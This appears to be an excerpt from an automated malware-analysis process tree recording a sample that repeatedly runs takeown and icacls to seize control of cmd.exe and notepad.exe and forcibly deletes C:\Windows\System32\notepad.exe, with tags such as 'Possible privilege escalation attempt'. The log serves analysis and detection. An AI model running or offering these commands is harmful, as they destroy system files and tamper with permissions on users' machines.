    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8184
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:4056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:8112
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      Possible privilege escalation attempt
      PID:6332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5580
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5596
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6652
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:6244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7228
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:5156
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:7308
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:3356
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\notepad.exe" /grant administrators:F"
    3⤵
    PID:6384
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6800
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\notepad.exe" /grant administrators:F
      4⤵
      PID:7220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:4320
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5704
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1968
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6360
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7984
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5960
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7160
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1976
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6016
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6512
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2108
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7580
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2932
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7632
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1980
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7848
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2304
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6784
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6764
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:7500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7736
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5712
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7728
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:6180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:4016
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:2236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6228
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      PID:6724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:7060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:8032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8000
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7540
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7448
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6880
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5644
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6132
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      PID:7816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8036
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:3920
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5884
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7088
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6988
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6956
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:7832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:4688
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7852
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:2652
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5708
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      PID:5532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8028
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:7152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7252
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:8156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8004
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4224
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6416
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Possible privilege escalation attempt
      PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5840
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7340
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      PID:6888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:1736
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\cmd.exe" /a
      4⤵
      Modifies file permissions
      PID:5252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\cmd.exe" /grant administrators:F"
    3⤵
    PID:1228
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Windows\System32\cmd.exe" /grant administrators:F
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q "C:\Windows\System32\notepad.exe""
    3⤵
    PID:6368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:8132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "icacls "C:\Windows\System32\cmd.exe" /grant administrators:F"
    3⤵
    PID:2484
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:7216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\cmd.exe" /a"
    3⤵
    PID:6772
